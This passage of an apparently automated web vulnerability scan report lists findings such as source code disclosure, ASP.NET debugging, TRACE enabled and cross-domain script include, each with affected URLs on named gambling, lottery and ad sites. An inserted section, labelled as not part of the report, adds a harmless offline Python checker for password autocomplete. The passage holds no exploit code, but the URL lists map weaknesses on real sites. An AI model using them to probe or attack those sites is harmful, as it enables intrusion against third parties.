12.370. http://www.winnings.com/how-to-win-money

12.371. http://www.winnings.com/instant-games

12.372. http://www.winnings.com/lottery-scratch-cards

12.373. http://www.winnings.com/scratch-cards

12.374. http://www.winnings.com/site-map

12.375. http://www.winnings.com/slots

12.376. http://www.winnings.com/wp-admin/admin-ajax.php

12.377. http://www.youtube.com/user/CrazyScratchCom

12.378. http://www.youtube.com/user/PostcodeLottery

12.379. http://www.youtube.com/user/primescratchcards1

12.380. http://www.youtube.com/v/

13. Password field with autocomplete enabled

13.1. http://affiliates.interwetten.com/

13.2. http://bingo.bet365.com/play/en/home/

13.3. https://bingo.betsson.com/en/

13.4. http://casino.bet365.com/extra/en/online-games/baccarat

13.5. http://casino.bet365.com/extra/en/online-games/blackjack

13.6. http://casino.bet365.com/extra/en/online-games/live-dealer

13.7. http://casino.bet365.com/extra/en/online-games/roulette

13.8. http://casino.bet365.com/home/en/

13.9. https://casino.betsson.com/en/

13.10. http://games.bet365.com/home/en/

13.11. https://games.betsson.com/en/

13.12. https://livecasino.betsson.com/en/

13.13. http://poker.bet365.com/home/en/

13.14. https://poker.betsson.com/en/

13.15. https://scratch.betsson.com/en/

13.16. https://scratch.betsson.com/en/

13.17. https://scratch.betsson.com/en/Casino

13.18. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

13.19. https://scratch.betsson.com/en/Casino/Bubble-Bingo

13.20. https://scratch.betsson.com/en/Casino/Disco-Keno

13.21. https://scratch.betsson.com/en/Casino/HiLo

13.22. https://scratch.betsson.com/en/Casino/Lucky-21

13.23. https://scratch.betsson.com/en/Casino/Namaste

13.24. https://scratch.betsson.com/en/Casino/Poker-King

13.25. https://scratch.betsson.com/en/Casino/Roulette

13.26. https://scratch.betsson.com/en/Casino/Royal-Slots

13.27. https://scratch.betsson.com/en/Casino/Slot-Super-7

13.28. https://scratch.betsson.com/en/Classic

13.29. https://scratch.betsson.com/en/Classic/3-Wow

13.30. https://scratch.betsson.com/en/Classic/7th-Heaven

13.31. https://scratch.betsson.com/en/Classic/Champagne

13.32. https://scratch.betsson.com/en/Classic/Golden-Fortune

13.33. https://scratch.betsson.com/en/Classic/Happy-Birthday

13.34. https://scratch.betsson.com/en/Classic/Jungle-Joy

13.35. https://scratch.betsson.com/en/Classic/Neighbors

13.36. https://scratch.betsson.com/en/Classic/Spy-Comics

13.37. https://scratch.betsson.com/en/Classic/Super-3-Wow

13.38. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

13.39. https://scratch.betsson.com/en/Classic/Wild-West

13.40. https://scratch.betsson.com/en/Classic/XO

13.41. https://scratch.betsson.com/en/Default.aspx

13.42. https://scratch.betsson.com/en/FAQ

13.43. https://scratch.betsson.com/en/Fantasy

13.44. https://scratch.betsson.com/en/Fantasy/Cash-Farm

13.45. https://scratch.betsson.com/en/Fantasy/Club-Pearl

13.46. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

13.47. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

13.48. https://scratch.betsson.com/en/Fantasy/Fast-Hands

13.49. https://scratch.betsson.com/en/Fantasy/Golden-Island

13.50. https://scratch.betsson.com/en/Fantasy/Knights-Battle

13.51. https://scratch.betsson.com/en/Fantasy/Love-Birds

13.52. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

13.53. https://scratch.betsson.com/en/Fantasy/Master-Mix

13.54. https://scratch.betsson.com/en/Fantasy/Memory-Madness

13.55. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

13.56. https://scratch.betsson.com/en/Fantasy/Outer-Space

13.57. https://scratch.betsson.com/en/Fantasy/Super-Chance

13.58. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

13.59. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

13.60. https://scratch.betsson.com/en/Fantasy/Treasure-Island

13.61. https://scratch.betsson.com/en/Fantasy/Zodiac

13.62. https://scratch.betsson.com/en/GameHistory

13.63. https://scratch.betsson.com/en/Information

13.64. https://scratch.betsson.com/en/News

13.65. https://scratch.betsson.com/en/OurScratchcards

13.66. https://scratch.betsson.com/en/Ourwinners

13.67. https://scratch.betsson.com/en/Slots/5th-Avenue

13.68. https://scratch.betsson.com/en/Slots/Adventure-Jack

13.69. https://scratch.betsson.com/en/Slots/Atlantis

13.70. https://scratch.betsson.com/en/Slots/Bon-Apetit

13.71. https://scratch.betsson.com/en/Slots/Cafe-Paris

13.72. https://scratch.betsson.com/en/Slots/Castle-Slots

13.73. https://scratch.betsson.com/en/Slots/Chic-Boutique

13.74. https://scratch.betsson.com/en/Slots/Conga-Beat

13.75. https://scratch.betsson.com/en/Slots/Egyptian-Magic

13.76. https://scratch.betsson.com/en/Slots/Esmeralda

13.77. https://scratch.betsson.com/en/Slots/Fair-Play

13.78. https://scratch.betsson.com/en/Slots/Fantasia

13.79. https://scratch.betsson.com/en/Slots/Grand-Crown

13.80. https://scratch.betsson.com/en/Slots/Holiday-Hotel

13.81. https://scratch.betsson.com/en/Slots/Ice-Land

13.82. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

13.83. https://scratch.betsson.com/en/Slots/Monaco-Glamour

13.84. https://scratch.betsson.com/en/Slots/Monte-Carlo

13.85. https://scratch.betsson.com/en/Slots/Pirates-Paradise

13.86. https://scratch.betsson.com/en/Slots/Sakura-Garden

13.87. https://scratch.betsson.com/en/Slots/Sea-And-Sun

13.88. https://scratch.betsson.com/en/Slots/Sky-Of-Love

13.89. https://scratch.betsson.com/en/Slots/Triple-Carnival

13.90. https://scratch.betsson.com/en/Slots/Tropical-Fruit

13.91. https://scratch.betsson.com/en/Sports/100m-Champion

13.92. https://scratch.betsson.com/en/Sports/Bowling

13.93. https://scratch.betsson.com/en/Sports/Darts

13.94. https://scratch.betsson.com/en/Sports/Goal-Kick

13.95. https://scratch.betsson.com/en/Sports/Gone-Fishing

13.96. https://scratch.betsson.com/en/Sports/Hippodrome

13.97. https://scratch.betsson.com/en/Sports/Ready-Set-Go

13.98. https://scratch.betsson.com/en/Sports/Road-Racing

13.99. https://scratch.betsson.com/en/Sports/World-Champions

13.100. http://twitter.com/PostcodeLottery

13.101. http://twitter.com/PrimeScratch

13.102. http://twitter.com/crazyscratch

13.103. http://twitter.com/ukscratch

13.104. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.105. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.106. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.107. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.108. http://www.bet365.com/extra/en/betting/in-play

13.109. http://www.bet365.com/extra/en/betting/live-streaming

13.110. http://www.bet365.com/extra/en/mobile/introduction/

13.111. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

13.112. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

13.113. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

13.114. https://www.betsson.com/start/en/

13.115. https://www.betsson.com/start/is/

13.116. https://www.betsson.com/web/en/sportsbook/

13.117. http://www.crazyrewards.com/

13.118. http://www.facebook.com/

13.119. http://www.facebook.com/

13.120. http://www.facebook.com/

13.121. http://www.facebook.com/PrimeScratchCards

13.122. http://www.facebook.com/WinningsCom

13.123. http://www.facebook.com/crazyscratch

13.124. http://www.facebook.com/peoplespostcodelottery

13.125. http://www.heavenaffiliates.com/

13.126. https://www.interwetten.com/Header-Contact

13.127. https://www.interwetten.com/Header-Help-FAQ

13.128. https://www.interwetten.com/Header-Menu-Casino

13.129. https://www.interwetten.com/Header-Menu-Home

13.130. https://www.interwetten.com/Header-Menu-Live

13.131. https://www.interwetten.com/Header-Menu-Sportsbook

13.132. https://www.interwetten.com/Header-Payment-possibilities

13.133. https://www.interwetten.com/Header-Tutorials

13.134. https://www.interwetten.com/ScriptResource.axd

13.135. https://www.interwetten.com/WebResource.axd

13.136. https://www.interwetten.com/en/Default.aspx

13.137. https://www.interwetten.com/en/american-football-betting

13.138. https://www.interwetten.com/en/australian-rules-football-betting

13.139. https://www.interwetten.com/en/beach-soccer-betting

13.140. https://www.interwetten.com/en/boxing-betting

13.141. https://www.interwetten.com/en/casino/default.aspx

13.142. https://www.interwetten.com/en/cycling-betting

13.143. https://www.interwetten.com/en/darts-betting

13.144. https://www.interwetten.com/en/default.aspx

13.145. https://www.interwetten.com/en/football-betting

13.146. https://www.interwetten.com/en/games/default.aspx

13.147. https://www.interwetten.com/en/golf-betting

13.148. https://www.interwetten.com/en/handball-betting

13.149. https://www.interwetten.com/en/ice-hockey-betting

13.150. https://www.interwetten.com/en/livebets

13.151. https://www.interwetten.com/en/motorbikes-betting

13.152. https://www.interwetten.com/en/online-skillgames

13.153. https://www.interwetten.com/en/politics-betting

13.154. https://www.interwetten.com/en/rugby-betting

13.155. https://www.interwetten.com/en/sailing-betting

13.156. https://www.interwetten.com/en/scratch/default.aspx

13.157. https://www.interwetten.com/en/ski-alpine-betting

13.158. https://www.interwetten.com/en/skill/default.aspx

13.159. https://www.interwetten.com/en/sportsbook/default.aspx

13.160. https://www.interwetten.com/en/tennis-betting

13.161. https://www.interwetten.com/en/volleyball-betting

13.162. https://www.interwetten.com/en/water-polo-betting

13.163. https://www.interwetten.com/en/winter-games-betting

13.164. http://www.postcodelottery.com/MyAccount.htm

13.165. http://www.tstglobal.com/

13.166. http://www.verisign.co.uk/
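
The entries under "Password field with autocomplete enabled" are only the scanner's index of affected URLs. As an added illustration that is not part of this report and not code from Hoyt LLC or XSS.CX, the Python script below performs the same check offline: it walks an HTML document, collects every `<input type="password">`, resolves the autocomplete setting that actually applies to it (the input's own attribute wins over the enclosing `<form>`'s), and reports the fields a browser is allowed to remember. `SAMPLE_HTML` is a constructed fragment, not a page fetched from any host listed above; the action paths in it are placeholders.

```python
"""Flag password inputs that do not carry an effective autocomplete="off".

Added example: standard-library only, runs offline on the constructed
SAMPLE_HTML below. The check mirrors the scanner finding "Password field
with autocomplete enabled": a password field is reported unless either the
input itself or its enclosing <form> sets autocomplete="off" (an explicit
value on the input overrides the form-level value, as in the HTML spec).
"""
from html.parser import HTMLParser


class _PasswordFieldCollector(HTMLParser):
    """Collect password inputs together with their effective autocomplete value."""

    def __init__(self):
        super().__init__()
        self._form_autocomplete = None   # autocomplete value of the open <form>, if any
        self._form_action = None         # action of the open <form>, for reporting
        self.fields = []                 # one dict per <input type="password"> seen

    def handle_starttag(self, tag, attrs):
        # Normalise attribute names to lower case; a valueless attribute
        # (e.g. <input disabled>) arrives as None, which we treat as "".
        a = {k.lower(): (v if v is not None else "") for k, v in attrs}
        if tag == "form":
            self._form_autocomplete = a.get("autocomplete")
            self._form_action = a.get("action", "")
        elif tag == "input" and a.get("type", "text").lower() == "password":
            own = a.get("autocomplete")
            # The input's own attribute, if present, overrides the form's.
            effective = own if own is not None else self._form_autocomplete
            self.fields.append({
                "name": a.get("name", ""),
                "form_action": self._form_action,
                "autocomplete": effective,
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_autocomplete = None
            self._form_action = None


def find_autocomplete_password_fields(html):
    """Return the password fields whose effective autocomplete is not "off"."""
    parser = _PasswordFieldCollector()
    parser.feed(html)
    parser.close()
    return [
        f for f in parser.fields
        if (f["autocomplete"] or "").strip().lower() != "off"
    ]


# Constructed sample: two login forms with different autocomplete settings.
# The paths are placeholders and do not refer to any real site.
SAMPLE_HTML = """
<form action="/login.aspx" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="/affiliates/login.aspx" method="post" autocomplete="off">
  <input type="password" name="pwd">
  <input type="password" name="pwd2" autocomplete="on">
</form>
"""

if __name__ == "__main__":
    for field in find_autocomplete_password_fields(SAMPLE_HTML):
        print("autocomplete enabled on password field %r in form %r (autocomplete=%r)"
              % (field["name"], field["form_action"], field["autocomplete"]))
```

On the constructed sample this reports `pass` (no attribute anywhere) and `pwd2` (the input's own `autocomplete="on"` overrides the form's `off`), and stays silent on `pwd`. Two caveats when triaging this class of finding: the attribute is only advisory, and current browsers ignore `autocomplete="off"` on password fields in favour of their own password managers, so the finding is an informational hardening point rather than a vulnerability on its own; and a scanner run over many localised mirrors of one template (as in the list above) will report the same field once per URL, so deduplicate by form before counting.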

14. Source code disclosure

14.1. http://neogames-tech.com/

14.2. http://neogames-tech.com/careers

14.3. http://neogames-tech.com/contact-us

14.4. http://neogames-tech.com/corporate

14.5. http://neogames-tech.com/corporate/gaming-license

14.6. http://neogames-tech.com/products

14.7. http://www.neogames.com/

14.8. http://www.neogames.com/contact-us

14.9. http://www.neogames.com/corporate

14.10. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

14.11. http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010

14.12. http://www.neogames.com/our-partners

14.13. http://www.neogames.com/products

15. ASP.NET debugging enabled

15.1. http://affiliates.interwetten.com/Default.aspx

15.2. http://www.gamblingtherapy.org/Default.aspx

15.3. http://www.paypoint.co.uk/Default.aspx

16. Referer-dependent response

16.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

16.2. http://d.tradex.openx.com/afr.php

16.3. http://www.facebook.com/PrimeScratchCards

16.4. http://www.facebook.com/plugins/likebox.php

16.5. http://www.primescratchcards.com/index.asp

17. Cross-domain POST

17.1. http://leandrovieira.com/projects/jquery/lightbox/

17.2. http://www.huddletogether.com/projects/lightbox2/

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.2. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.3. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.4. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.5. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

18.6. http://ad.yieldmanager.com/imp

18.7. http://d.tradex.openx.com/afr.php

18.8. http://home.okscratchcards.com/Promotions.aspx

18.9. http://home.okscratchcards.com/visit.aspx

18.10. http://itunes.apple.com/us/app/pclottery/id399201446

18.11. http://primescratchcards.com/images/index.asp

18.12. https://scratch.betsson.com/en/

18.13. https://scratch.betsson.com/en/

18.14. http://scratch.co.uk/

18.15. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

18.16. https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js

18.17. https://www.aspireaffiliates.com/

18.18. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

18.19. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

18.20. https://www.aspireaffiliates.com/marketing-samples/

18.21. https://www.aspireaffiliates.com/mobile/

18.22. http://www.bigmoneyscratch.com/Home.aspx

18.23. http://www.facebook.com/

18.24. http://www.facebook.com/WinningsCom

18.25. http://www.facebook.com/plugins/likebox.php

18.26. http://www.facebook.com/plugins/likebox.php

18.27. http://www.incomate.com/

18.28. http://www.info.crazyscratch.com/AboutUs.aspx

18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx

18.30. http://www.info.crazyscratch.com/FairPlay.aspx

18.31. http://www.info.crazyscratch.com/Help.aspx

18.32. http://www.info.crazyscratch.com/InviteFriend.aspx

18.33. http://www.info.crazyscratch.com/PlayersClub.aspx

18.34. http://www.info.crazyscratch.com/Privacy.aspx

18.35. http://www.info.crazyscratch.com/Promotions.aspx

18.36. http://www.info.crazyscratch.com/Responsible.aspx

18.37. http://www.info.crazyscratch.com/Terms.aspx

18.38. http://www.info.crazyscratch.com/UnderAge.aspx

18.39. https://www.interwetten.com/en/default.aspx

18.40. http://www.karamba.com/Home.aspx

18.41. http://www.lga.org.mt/lga/content.aspx

18.42. https://www.neogamespartners.com/

18.43. http://www.okscratchcards.com/

18.44. http://www.okscratchcards.com/terms-and-conditions.aspx

18.45. http://www.primescratchcards.com/index.asp

18.46. http://www.scratch2cash.com/Home.aspx

18.47. http://www.scratchcardheaven.com/Home.aspx

18.48. http://www.trustlogo.com/ttb_searcher/trustlogo

18.49. http://www.vincite.net/

19. Cross-domain script include

19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

19.3. https://bingo.betsson.com/en/

19.4. http://blog.postcodelottery.com/

19.5. http://br.bigmoneyscratch.com/Home.aspx

19.6. http://br.winnings.com/

19.7. http://casino.bet365.com/home/en/

19.8. https://casino.betsson.com/en/

19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

19.10. http://d.tradex.openx.com/afr.php

19.11. http://da.bigmoneyscratch.com/Home.aspx

19.12. http://da.winnings.com/

19.13. http://de.bigmoneyscratch.com/Home.aspx

19.14. http://de.winnings.com/

19.15. http://el.winnings.com/

19.16. http://es.bigmoneyscratch.com/Home.aspx

19.17. http://es.winnings.com/

19.18. http://fi.bigmoneyscratch.com/Home.aspx

19.19. http://fi.winnings.com/

19.20. http://fr.bigmoneyscratch.com/Home.aspx

19.21. http://fr.winnings.com/

19.22. http://games.bet365.com/home/en/

19.23. https://games.betsson.com/en/

19.24. http://getclicky.com/66384109

19.25. http://it.bigmoneyscratch.com/Home.aspx

19.26. http://itunes.apple.com/us/app/pclottery/id399201446

19.27. http://jquery.com/

19.28. http://leandrovieira.com/projects/jquery/lightbox/

19.29. https://livecasino.betsson.com/en/

19.30. http://mad4milk.net/

19.31. http://nl.bigmoneyscratch.com/Home.aspx

19.32. http://nl.winnings.com/

19.33. http://no.bigmoneyscratch.com/Home.aspx

19.34. http://no.winnings.com/

19.35. http://okscratchcards.com/

19.36. http://poker.bet365.com/home/en/

19.37. https://poker.betsson.com/en/

19.38. http://pt.bigmoneyscratch.com/Home.aspx

19.39. http://pt.winnings.com/

19.40. http://ronaldheft.com/code/analyticator/

19.41. https://scratch.betsson.com/en/

19.42. https://scratch.betsson.com/en/Casino

19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo

19.45. https://scratch.betsson.com/en/Casino/Disco-Keno

19.46. https://scratch.betsson.com/en/Casino/HiLo

19.47. https://scratch.betsson.com/en/Casino/Lucky-21

19.48. https://scratch.betsson.com/en/Casino/Namaste

19.49. https://scratch.betsson.com/en/Casino/Poker-King

19.50. https://scratch.betsson.com/en/Casino/Roulette

19.51. https://scratch.betsson.com/en/Casino/Royal-Slots

19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7

19.53. https://scratch.betsson.com/en/Classic

19.54. https://scratch.betsson.com/en/Classic/3-Wow

19.55. https://scratch.betsson.com/en/Classic/7th-Heaven

19.56. https://scratch.betsson.com/en/Classic/Champagne

19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune

19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday

19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy

19.60. https://scratch.betsson.com/en/Classic/Neighbors

19.61. https://scratch.betsson.com/en/Classic/Spy-Comics

19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow

19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

19.64. https://scratch.betsson.com/en/Classic/Wild-West

19.65. https://scratch.betsson.com/en/Classic/XO

19.66. https://scratch.betsson.com/en/Default.aspx

19.67. https://scratch.betsson.com/en/FAQ

19.68. https://scratch.betsson.com/en/Fantasy

19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm

19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl

19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands

19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island

19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle

19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds

19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix

19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness

19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space

19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance

19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island

19.86. https://scratch.betsson.com/en/Fantasy/Zodiac

19.87. https://scratch.betsson.com/en/GameHistory

19.88. https://scratch.betsson.com/en/Information

19.89. https://scratch.betsson.com/en/News

19.90. https://scratch.betsson.com/en/OurScratchcards

19.91. https://scratch.betsson.com/en/Ourwinners

19.92. https://scratch.betsson.com/en/Slots/5th-Avenue

19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack

19.94. https://scratch.betsson.com/en/Slots/Atlantis

19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit

19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris

19.97. https://scratch.betsson.com/en/Slots/Castle-Slots

19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique

19.99. https://scratch.betsson.com/en/Slots/Conga-Beat

19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic

19.101. https://scratch.betsson.com/en/Slots/Esmeralda

19.102. https://scratch.betsson.com/en/Slots/Fair-Play

19.103. https://scratch.betsson.com/en/Slots/Fantasia

19.104. https://scratch.betsson.com/en/Slots/Grand-Crown

19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel

19.106. https://scratch.betsson.com/en/Slots/Ice-Land

19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour

19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo

19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise

19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden

19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun

19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love

19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival

19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit

19.116. https://scratch.betsson.com/en/Sports/100m-Champion

19.117. https://scratch.betsson.com/en/Sports/Bowling

19.118. https://scratch.betsson.com/en/Sports/Darts

19.119. https://scratch.betsson.com/en/Sports/Goal-Kick

19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing

19.121. https://scratch.betsson.com/en/Sports/Hippodrome

19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go

19.123. https://scratch.betsson.com/en/Sports/Road-Racing

19.124. https://scratch.betsson.com/en/Sports/World-Champions

19.125. http://sv.bigmoneyscratch.com/Home.aspx

19.126. http://sv.winnings.com/

19.127. http://twitter.com/PostcodeLottery

19.128. http://twitter.com/PrimeScratch

19.129. http://twitter.com/crazyscratch

19.130. http://twitter.com/ukscratch

19.131. http://www.affiliatelounge.com/

19.132. https://www.aspireaffiliates.com/

19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

19.134. https://www.aspireaffiliates.com/marketing-samples/

19.135. https://www.aspireaffiliates.com/mobile/

19.136. https://www.betsson.com/start/en/

19.137. https://www.betsson.com/start/is/

19.138. https://www.betsson.com/web/en/sportsbook/

19.139. http://www.bigmoneyscratch.com/

19.140. http://www.facebook.com/

19.141. http://www.facebook.com/PrimeScratchCards

19.142. http://www.facebook.com/PrimeScratchCards

19.143. http://www.facebook.com/WinningsCom

19.144. http://www.facebook.com/crazyscratch

19.145. http://www.facebook.com/peoplespostcodelottery

19.146. http://www.facebook.com/plugins/likebox.php

19.147. http://www.gx4.com/

19.148. http://www.heavenaffiliates.com/

19.149. http://www.huddletogether.com/projects/lightbox2/

19.150. http://www.incomate.com/

19.151. http://www.metacafe.com/fplayer/

19.152. https://www.neogamespartners.com/

19.153. https://www.norskelodd.com/no/

19.154. https://www.norskelodd.com/no/FAQ

19.155. https://www.norskelodd.com/no/aboutus/

19.156. https://www.norskelodd.com/no/charity/

19.157. https://www.norskelodd.com/no/default.aspx

19.158. https://www.norskelodd.com/no/fair-play/

19.159. https://www.norskelodd.com/no/forgotten-password

19.160. https://www.norskelodd.com/no/play/3Wow

19.161. https://www.norskelodd.com/no/play/7thHeaven

19.162. https://www.norskelodd.com/no/play/GonzosQuest

19.163. https://www.norskelodd.com/no/promotions/

19.164. http://www.ok.co.uk/home/

19.165. http://www.okscratchcards.com/

19.166. http://www.opensource.org/licenses/mit-license.php

19.167. http://www.primegrattage.com/

19.168. http://www.vincite.net/

19.169. http://www.winnings.com/

19.170. http://www.winnings.com/how-to-win-money

19.171. http://www.winnings.com/instant-games

19.172. http://www.winnings.com/lottery-scratch-cards

19.173. http://www.winnings.com/scratch-cards

19.174. http://www.winnings.com/site-map

19.175. http://www.winnings.com/slots

19.176. http://www.youtube.com/user/CrazyScratchCom

19.177. http://www.youtube.com/user/PostcodeLottery

19.178. http://www.youtube.com/user/primescratchcards1

20. TRACE method is enabled

20.1. http://d.tradex.openx.com/

20.2. http://d.xp1.ru4.com/

20.3. http://gmpg.org/

20.4. http://jquery.com/

20.5. http://jquery.org/

20.6. http://m.xp1.ru4.com/

20.7. http://optimized-by.rubiconproject.com/

20.8. https://sealinfo.verisign.com/

20.9. http://secure-us.imrworldwide.com/

20.10. http://sizzlejs.com/

20.11. http://winter.metacafe.com/

20.12. http://www.egba.eu/

20.13. http://www.gambleaware.co.uk/

20.14. http://www.gamcare.org.uk/

20.15. http://www.gx4.com/

20.16. http://www.nedstat.com/

20.17. http://www.opensource.org/

20.18. http://www.postcodelottery.com/

20.19. https://www.postcodelottery.com/

20.20. http://www.quirksmode.org/

20.21. http://www.tstglobal.com/

21. Email addresses disclosed

21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

21.3. https://members.bet365.com/members/chat/

21.4. http://neogames-tech.com/careers

21.5. http://neogames-tech.com/contact-us

21.6. http://neogames-tech.com/corporate

21.7. http://primescratchcards.com/images/HelpDepositMethods.asp

21.8. http://primescratchcards.com/images/InviteFriend.asp

21.9. http://primescratchcards.com/images/Responsible.asp

21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp

21.11. http://primescratchcards.com/images/aboutus.asp

21.12. http://primescratchcards.com/images/affiliates.asp

21.13. http://primescratchcards.com/images/bg.jpg

21.14. http://primescratchcards.com/images/contactus.asp

21.15. http://primescratchcards.com/images/fairplay.asp

21.16. http://primescratchcards.com/images/help.asp

21.17. http://primescratchcards.com/images/index.asp

21.18. http://primescratchcards.com/images/media.asp

21.19. http://primescratchcards.com/images/playersclub.asp

21.20. http://primescratchcards.com/images/promotions.asp

21.21. http://primescratchcards.com/images/terms.asp

21.22. http://primescratchcards.com/images/underage.asp

21.23. http://scratch.co.uk/about/

21.24. http://scratch.co.uk/contact/

21.25. http://scratch.co.uk/help/

21.26. http://scratch.co.uk/help/privacy/

21.27. http://scratch.co.uk/problem-gambling/

21.28. http://scratch.co.uk/vis-club/

21.29. http://trk.primescratchcards.com/w3c/p3p.xml

21.30. http://widgets.twimg.com/j/2/widget.css

21.31. http://widgets.twimg.com/j/2/widget.js

21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js

21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js

21.34. https://www.betsson.com/en/customer-service/

21.35. https://www.betsson.com/en/customer-service/responsible-gaming/

21.36. https://www.betsson.com/en/customer-service/terms/index.asp

21.37. http://www.bigmoneyscratch.com/Affiliates.aspx

21.38. http://www.gamblersanonymous.org/

21.39. http://www.gx4.com/

21.40. http://www.huddletogether.com/projects/lightbox2/

21.41. http://www.lga.org.mt/lga/content.aspx

21.42. http://www.lga.org.mt/lga/home.aspx

21.43. http://www.neogames.com/careers

21.44. http://www.neogames.com/contact-us

21.45. http://www.neogames.com/corporate

21.46. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

21.47. https://www.norskelodd.com/no/FAQ

21.48. https://www.norskelodd.com/no/charity/

21.49. http://www.opensource.org/licenses/mit-license.php

21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

21.53. http://www.primegrattage.com/

21.54. http://www.primescratchcards.com/

21.55. http://www.primescratchcards.com/HelpDepositMethods.asp

21.56. http://www.primescratchcards.com/InviteFriend.asp

21.57. http://www.primescratchcards.com/Responsible.asp

21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp

21.59. http://www.primescratchcards.com/aboutus.asp

21.60. http://www.primescratchcards.com/affiliates.asp

21.61. http://www.primescratchcards.com/contactus.asp

21.62. http://www.primescratchcards.com/fairplay.asp

21.63. http://www.primescratchcards.com/help.asp

21.64. http://www.primescratchcards.com/index.asp

21.65. http://www.primescratchcards.com/media.asp

21.66. http://www.primescratchcards.com/playersclub.asp

21.67. http://www.primescratchcards.com/promotions.asp

21.68. http://www.primescratchcards.com/terms.asp

21.69. http://www.primescratchcards.com/underage.asp

21.70. http://www.primescratchcards.com.br/

21.71. http://www.svenskalotter.com/Affiliates.aspx

21.72. http://www.svenskalotter.com/Charity.aspx

21.73. http://www.verisign.co.uk/

22. Private IP addresses disclosed

22.1. http://connect.facebook.net/en_US/all.js

22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

